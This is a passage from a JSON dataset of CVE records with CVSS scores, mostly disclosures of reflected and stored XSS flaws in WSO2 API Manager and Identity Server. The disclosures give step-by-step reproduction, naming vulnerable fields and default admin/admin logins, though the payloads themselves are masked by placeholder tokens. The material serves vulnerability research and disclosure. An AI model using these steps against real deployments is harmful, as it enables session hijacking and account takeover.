  42181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42182. "severity": "MEDIUM",
  42183. "baseScore": 4.8,
  42184. "impactScore": 2.7,
  42185. "exploitabilityScore": 1.7
  42186. },
  42187. {
  42188. "CVE_ID": "CVE-2019-20435",
  42189. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/18",
  42190. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/18",
  42191. "Repo_new": "cybersecurityworks/disclosed",
  42192. "Issue_Created_At": "2019-11-27T12:00:44Z",
  42193. "description": "Reflected Cross Site Scripting (XSS) in WSO2 Product WSO2 API Manager version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager Product. APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) POST request APITAG variable is vulnerable to reflected cross site scripting (XSS) in the URL, FILETAG FILETAG Figure NUMBERTAG New document created in the API FILETAG Figure NUMBERTAG Choose APITAG Content\u2019 to edit document information. FILETAG Figure NUMBERTAG Actual GET request APITAG URL APITAG FILETAG Figure NUMBERTAG APITAG Crafted request APITAG with XSS payload, ERRORTAG gets reflected in the same browser as response. APITAG Steps APITAG NUMBERTAG Login to the application APITAG (admin/admin) APITAG through the login APITAG URL. APITAG NUMBERTAG Go to API APITAG APITAG APITAG section in the created API NUMBERTAG APITAG APITAG New document\u2019 APITAG details and submit it NUMBERTAG Go to APITAG APITAG Content\u2019 APITAG available to edit the document details NUMBERTAG Modify the APITAG URL APITAG variable, APITAG with a XSS payload, ERRORTAG NUMBERTAG Now, click on the APITAG crafted URL APITAG to execute the injected XSS payload every time. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for reporting the issue. We'll look into this and get back to you. Appreciate your continued support NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Customer Announcement is done. Public Announcement is scheduled at the end of September. [postponed to September due to internal reasons NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42195. "severity": "MEDIUM",
  42196. "baseScore": 4.8,
  42197. "impactScore": 2.7,
  42198. "exploitabilityScore": 1.7
  42199. },
  42200. {
  42201. "CVE_ID": "CVE-2019-20436",
  42202. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/19",
  42203. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/19",
  42204. "Repo_new": "cybersecurityworks/disclosed",
  42205. "Issue_Created_At": "2019-11-29T10:51:10Z",
  42206. "description": "Stored Cross Site Scripting (XSS) in WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG dialect APITAG AFFECTED PRODUCTS NUMBERTAG WSO2 API Manager NUMBERTAG WSO2 API Manager Analytics NUMBERTAG WSO2 IS as Key Manager NUMBERTAG WSO2 Identity Server NUMBERTAG WSO2 Identity Server Analytics Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) POST request dialect variable is vulnerable to stored cross site scripting (XSS) in the URL, FILETAG Figure NUMBERTAG Adding XSS payload to dialect variable Figure NUMBERTAG Added XSS payload, APITAG gets stored Figure NUMBERTAG Edit the service provider information Figure NUMBERTAG Select the XSS payload stored in the claims Figure NUMBERTAG Add Service Provider Claim Dialect URI by selecting the stored URI value from claims Figure NUMBERTAG Injected XSS payload gets executed in the browser after adding claims. APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG APITAG Add APITAG Dialect URI Value to the POST Request APITAG URL, APITAG in the dialect variable NUMBERTAG Now, Go to APITAG Service Provider section. APITAG NUMBERTAG Create new service provider information or APITAG edit APITAG an existing Service Provider information APITAG its XSS NUMBERTAG Select Service Provider Claim Dialect in the given list of details and click on APITAG button to see the injected XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for reporting the issue. We'll look into this and get back to you. Appreciate your continued support NUMBERTAG Customer Announcement End of July, Public Announcement: End of August NUMBERTAG Customer Announcement is done. Public Announcement is scheduled NUMBERTAG Customer Announcement is done. Public Announcement is scheduled at the end of September. [postponed to September due to internal reasons NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42208. "severity": "MEDIUM",
  42209. "baseScore": 6.1,
  42210. "impactScore": 2.7,
  42211. "exploitabilityScore": 2.8
  42212. },
  42213. {
  42214. "CVE_ID": "CVE-2019-20437",
  42215. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/20",
  42216. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/20",
  42217. "Repo_new": "cybersecurityworks/disclosed",
  42218. "Issue_Created_At": "2019-11-29T11:09:28Z",
  42219. "description": "Stored Cross Site Scripting (XSS) in APITAG Type\" variable on WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG dialect APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Adding XSS payload to dialect variable FILETAG Figure NUMBERTAG Added XSS payload, APITAG gets stored FILETAG Figure NUMBERTAG Edit the service provider information FILETAG Figure NUMBERTAG Select the XSS payload stored in the claims FILETAG Figure NUMBERTAG Add Service Provider Claim Dialect URI by selecting the stored URI value from claims FILETAG Figure NUMBERTAG Injected XSS payload gets executed in the browser after adding claims. APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG APITAG Add APITAG Dialect URI Value to the POST Request APITAG URL, APITAG in the dialect variable NUMBERTAG Now, Go to APITAG Service Provider section. APITAG NUMBERTAG Create new service provider information or APITAG edit APITAG an existing Service Provider information APITAG its XSS NUMBERTAG Select Service Provider Claim Dialect in the given list of details and click on APITAG button to see the injected XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in WSO2 API Manager Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for the latest analysis on WSO2 Identity Server. We'll do the review on this and get back to you soon NUMBERTAG Got mail from WSO2 team saying, APITAG issues reported in Identity Server are under the analyzing state NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42221. "severity": "MEDIUM",
  42222. "baseScore": 6.1,
  42223. "impactScore": 2.7,
  42224. "exploitabilityScore": 2.8
  42225. },
  42226. {
  42227. "CVE_ID": "CVE-2019-20438",
  42228. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/22",
  42229. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/22",
  42230. "Repo_new": "cybersecurityworks/disclosed",
  42231. "Issue_Created_At": "2020-01-17T12:35:46Z",
  42232. "description": "Stored Cross Site Scripting (XSS) in 'inline API documentation editor page' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Choose APITAG Content\u201d after creating a document FILETAG Figure NUMBERTAG Clicked on APITAG to add XSS payload FILETAG Figure NUMBERTAG Use APITAG button to Save the document with added \u201cXSS Payload\u201d FILETAG Figure NUMBERTAG Saving and clicking on APITAG back stores the XSS payload and executes in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed whenever the user loads the APITAG page, APITAG APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Create an API and navigate to doc tag to APITAG APITAG new document\u201d APITAG NUMBERTAG Click on APITAG APITAG content\u201d APITAG after creating a valid document NUMBERTAG Edit the document content value in \u201ccontent\u201d variable with XSS payload, APITAG APITAG NUMBERTAG Now, Whenever the user loads the APITAG page APITAG the stored XSS payload gets executed in the browser. APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Discovered in WSO2 API Manager version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your continuous effort on analyzing security vulnerabilities on WSO2 products. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42234. "severity": "MEDIUM",
  42235. "baseScore": 4.8,
  42236. "impactScore": 2.7,
  42237. "exploitabilityScore": 1.7
  42238. },
  42239. {
  42240. "CVE_ID": "CVE-2019-20439",
  42241. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/21",
  42242. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/21",
  42243. "Repo_new": "cybersecurityworks/disclosed",
  42244. "Issue_Created_At": "2019-12-24T10:37:12Z",
  42245. "description": "Reflected Cross Site Scripting (XSS) in 'roles' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Reflected APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Start creating an API FILETAG Figure NUMBERTAG Click on Add Scope button to add resources information FILETAG Figure NUMBERTAG Enter XSS Payload in Roles section FILETAG Figure NUMBERTAG Injected XSS payload, ERRORTAG gets reflected in the same browser as response. APITAG Steps APITAG NUMBERTAG Login to the application (admin/admin) through the login APITAG URL. APITAG NUMBERTAG Go to APITAG Design API page APITAG to create API NUMBERTAG Fill the details up to APITAG manage page. APITAG NUMBERTAG Choose Add Scope to include resources information NUMBERTAG Add XSS payload, ERRORTAG in Roles column NUMBERTAG Clicking on Add Scope button executes the injected XSS Payload. APITAG APITAG NUMBERTAG Discovered in WSO2 Identity Server NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your continuous effort on analysing security vulnerabilities on WSO2 products. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42246. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42247. "severity": "MEDIUM",
  42248. "baseScore": 4.8,
  42249. "impactScore": 2.7,
  42250. "exploitabilityScore": 1.7
  42251. },
  42252. {
  42253. "CVE_ID": "CVE-2019-20440",
  42254. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/24",
  42255. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/24",
  42256. "Repo_new": "cybersecurityworks/disclosed",
  42257. "Issue_Created_At": "2020-01-20T09:44:04Z",
  42258. "description": "Multiple Reflected Cross Site Scripting (XSS) in APITAG 'version' and APITAG of created API document using XSS payload' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Multiple reflected APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS NUMBERTAG WSO2 API Manager Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) The following Vulnerability is tested on WSO2 API Manager version NUMBERTAG Product. Issue NUMBERTAG Multiple reflected cross site scripting: Figure NUMBERTAG Update the existing document information created. (here API Name is \u2018reflected XSS\u2019) Figure NUMBERTAG Add XSS payload to the variable APITAG Figure NUMBERTAG HTTP Response for the modified APITAG variable with XSS payload. Figure NUMBERTAG Injected XSS payload, APITAG APITAG gets reflected in the browser response. Issue NUMBERTAG Figure NUMBERTAG Injected XSS payload in variable APITAG version and APITAG gets reflected in the Response Figure NUMBERTAG Injected payload gets reflected in the browser THREE times (THREE places) Figure NUMBERTAG Page Looks after executing the injected XSS payload APITAG Steps APITAG NUMBERTAG Login to the application (admin/admin) through the login APITAG URL. APITAG NUMBERTAG Go to the APITAG page APITAG where an API is already created NUMBERTAG Create a document for the created API by clicking on APITAG New Document\u201d button NUMBERTAG Created documents are listed as shown in figure NUMBERTAG Click on APITAG button to update document information NUMBERTAG Add relevant information and capture the request in proxy to add XSS payload APITAG APITAG \u201d in APITAG variable NUMBERTAG Now, Injected XSS payload gets executed in the browser. Note: Similarly, add XSS payload to the other vulnerable variables \u201cversion\u201d and APITAG which reflects in the browser. APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Reported to EMAILTAG NUMBERTAG Got response from WSO2 security team, APITAG you for reaching out to WSO2 Platform Security Team. We will evaluate your finding and get back to you as soon as possible with our feedback NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42260. "severity": "MEDIUM",
  42261. "baseScore": 4.8,
  42262. "impactScore": 2.7,
  42263. "exploitabilityScore": 1.7
  42264. },
  42265. {
  42266. "CVE_ID": "CVE-2019-20441",
  42267. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/23",
  42268. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/23",
  42269. "Repo_new": "cybersecurityworks/disclosed",
  42270. "Issue_Created_At": "2020-01-20T07:37:31Z",
  42271. "description": "Stored Cross Site Scripting (XSS) in ' HTTP POST request with a harmful request parameter for context' | WSO2 API Manager version NUMBERTAG WSO2 Product. Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 API Manager APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Design an API with valid values in the required fields of the page FILETAG Figure NUMBERTAG Click on APITAG Implement\u201d after completing the forms with valid information FILETAG Figure NUMBERTAG alid HTTP Request captured in the proxy with filled information FILETAG Figure NUMBERTAG APITAG variable is added with XSS Payload, APITAG APITAG FILETAG Figure NUMBERTAG Submitted the API details to the server with XSS payload FILETAG Figure NUMBERTAG SS Payload gets stored and reflects whenever the user views the APITAG page. APITAG FILETAG Figure NUMBERTAG Stored XSS payload in the source code APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to the APITAG URL APITAG for creating an API NUMBERTAG Fill all the required information and click on APITAG Implement NUMBERTAG Capture the HTTP request in the proxy and add XSS payload APITAG APITAG \u201d to the \u201ccontext\u201d variable NUMBERTAG Deploy the prototype with added XSS payload NUMBERTAG Injected XSS payload gets reflected whenever the user visits or reloads the APITAG page. APITAG APITAG APITAG NUMBERTAG Discovered in APITAG APITAG APITAG NUMBERTAG Reported to APITAG intigriti APITAG platform NUMBERTAG Closed the issue in APITAG intigriti APITAG platform saying it as \"out of scope NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for sending new issues. Let us evaluate them and get back to you with the results NUMBERTAG Got mail from WSO2 team saying, \"We were able to reproduce the issue with APIM NUMBERTAG We will fix this and provide you with an update NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement is scheduled NUMBERTAG Got mail saying, APITAG Security Announcement for the issues are scheduled by the end of September NUMBERTAG Customer Announcement is done. Public Announcement is done. Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42272. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42273. "severity": "MEDIUM",
  42274. "baseScore": 4.8,
  42275. "impactScore": 2.7,
  42276. "exploitabilityScore": 1.7
  42277. },
  42278. {
  42279. "CVE_ID": "CVE-2019-20442",
  42280. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/25",
  42281. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/25",
  42282. "Repo_new": "cybersecurityworks/disclosed",
  42283. "Issue_Created_At": "2020-01-20T11:16:47Z",
  42284. "description": "Stored Cross Site Scripting (XSS) in APITAG variable | WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Choose APITAG APITAG APITAG from the Registry option FILETAG Figure NUMBERTAG Select any on APITAG and add APITAG APITAG APITAG from APITAG section in the same page. FILETAG Figure NUMBERTAG Capture the POST request in burp suite proxy and add XSS payload, ERRORTAG to APITAG variable FILETAG Figure NUMBERTAG Injected XSS Payload gets stored and executed in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed whenever the user loads the page APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG Select any on APITAG and add APITAG APITAG APITAG from APITAG section in the same page NUMBERTAG Capture the POST request in burp suite proxy and add XSS payload, ERRORTAG to APITAG variable NUMBERTAG Now the injected XSS payload gets stored and executes whenever the user loads the page. APITAG APITAG NUMBERTAG Discovered in APITAG Version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your analysis report. We will evaluate your finding and get back to you soon with our feedback NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Got mail saying, APITAG Announcement is done. Public Announcement is scheduled at end of November NUMBERTAG Got mail saying, \"We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues NUMBERTAG Got mail saying, \"... stored XSS issues APITAG No NUMBERTAG Document No NUMBERTAG were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ...\" Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42285. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42286. "severity": "MEDIUM",
  42287. "baseScore": 4.8,
  42288. "impactScore": 2.7,
  42289. "exploitabilityScore": 1.7
  42290. },
  42291. {
  42292. "CVE_ID": "CVE-2019-20443",
  42293. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/26",
  42294. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/26",
  42295. "Repo_new": "cybersecurityworks/disclosed",
  42296. "Issue_Created_At": "2020-01-20T11:30:13Z",
  42297. "description": "Stored Cross Site Scripting (XSS) in APITAG variable | WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Edit APITAG value in APITAG section FILETAG Figure NUMBERTAG Save APITAG with XSS payload, ERRORTAG FILETAG Figure NUMBERTAG Injected XSS payload gets stored to the application FILETAG Figure NUMBERTAG Injected XSS Payload gets stored and executed in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed in APITAG throughout the page whenever the user loads the page APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG Click on Metadata to edit values NUMBERTAG Edit & Save APITAG value with XSS Payload, ERRORTAG NUMBERTAG Now, the injected XSS Payload gets executed whenever the user visits the page. APITAG APITAG NUMBERTAG Discovered in APITAG Version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your analysis report. We will evaluate your finding and get back to you soon with our feedback NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Got mail saying, APITAG Announcement is done. Public Announcement is scheduled at end of November NUMBERTAG Got mail saying, \"We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues NUMBERTAG Got mail saying, \"... stored XSS issues APITAG No NUMBERTAG Document No NUMBERTAG were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ...\" Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42298. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42299. "severity": "MEDIUM",
  42300. "baseScore": 4.8,
  42301. "impactScore": 2.7,
  42302. "exploitabilityScore": 1.7
  42303. },
  42304. {
  42305. "CVE_ID": "CVE-2019-20444",
  42306. "Issue_Url_old": "https://github.com/netty/netty/issues/9866",
  42307. "Issue_Url_new": "https://github.com/netty/netty/issues/9866",
  42308. "Repo_new": "netty/netty",
  42309. "Issue_Created_At": "2019-12-10T12:38:14Z",
